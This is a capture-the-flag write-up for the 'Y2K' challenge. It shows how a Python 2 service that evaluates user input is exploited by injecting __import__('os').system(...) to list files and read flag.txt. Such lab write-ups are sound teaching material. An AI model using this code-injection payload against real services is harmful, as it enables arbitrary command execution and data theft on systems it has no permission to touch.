Y2K

Challenge:

They told us the world was going to end in the year 2000! But it didn't… when will the world end?

nc challenge.ctf.games 31656

Solution:

Connecting to the service produced the following:

$ nc challenge.ctf.games 31656
What year do YOU think the world will end?

Entering a year produced a response that included my input:

1927
Yeah! I agree with you! I also think the world will end in the year
1927

At first it appears the service is simply echo'ing my input so I ran another quick test to see if my input was being evaluated by sending "1900+1020" :

$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
1900+1020
Yeah! I agree with you! I also think the world will end in the year
2920

The service responded with 2920 so it appears that my input is being evaluated. Next I checked to see how it handles errors by forcing a "division by zero" error by entering "2/0":

$ nc challenge.ctf.games 31656
What year do YOU think the world will end?
2/0
Traceback (most recent call last):
  File "/home/challenge/server.py", line 4, in <module>
    end = input()
  File "<string>", line 1, in <module>
ZeroDivisionError: integer division or modulo by zero

So the service lacks error handling and I also now know the service is a Python script. Escaping from Python Jails is a common CTF challenge, so I start with some basic techniques.

__import__("os").system("ls")

server.py
flag.txt

Getting the flag is as simple as viewing the contents of the flag.txt file.

__import__("os").system("cat flag.txt")

flag{we_are_saved_from_py2_k}

Published:

Updated:

Leave a comment